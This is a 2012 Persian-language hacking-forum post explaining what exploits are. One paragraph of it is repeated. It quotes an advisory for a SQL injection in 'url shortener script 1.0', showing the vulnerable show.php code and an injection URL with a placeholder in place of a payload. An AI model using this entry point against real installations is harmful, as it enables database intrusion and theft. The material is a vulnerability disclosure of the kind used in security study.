01-25-2012، 12:29 AM
(آخرین تغییر در ارسال: 01-25-2012، 12:31 AM توسط Amin_Mansouri.)
اکسپلویت ها به زبان های مختلفی هستن خلاصه راحت بگم کارتو راحت میکنه و دیگه کارهای دستی رو کم میکنه
مثلا یه اکسپولیت میاد میگن از فلا سیستم مثلا وردپرس همه این باگ رو دارن باگ هم از نوع sql injection هست اکسپولیتش رو مینیویسن کارتو راحت تر میکنه !
نمونه
مثلا یه اکسپولیت میاد میگن از فلا سیستم مثلا وردپرس همه این باگ رو دارن باگ هم از نوع sql injection هست اکسپولیتش رو مینیویسن کارتو راحت تر میکنه !
نمونه
کد:
url shortener script 1.0 sql injection Vulnerabilities
===================================================================================
# Exploit Title: url shortener script 1.0 sql injection Vulnerabilities
# Author: M.Jock3R
# Script Support Link: http://djpate.com/
# Download Script: http://www.phpkode.com/scripts/item/url-shortener-script/
# Category:: webapps
# Tested on: windows XP Sp2 FR
===================================================================================
Vuln file : show.php
Vuln Code :
if($_GET['id']){
require("mysql.php");
$id = addslashes($_GET['id']);
$getUrl = mysql_query("select url from urls where id = $id");
Exploit:
http://localhost/url-shortener-script/show.php?id=[Inj3ct]
===================================================================================
Greets To :
adelsbm / attiadona / Wjunction forum
---------------------------------
I Love you Mindy
---------------------------------
Email : madrido.jocker@gmail.com
THANKS TO ALL ALGERIANS HACK3RS
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg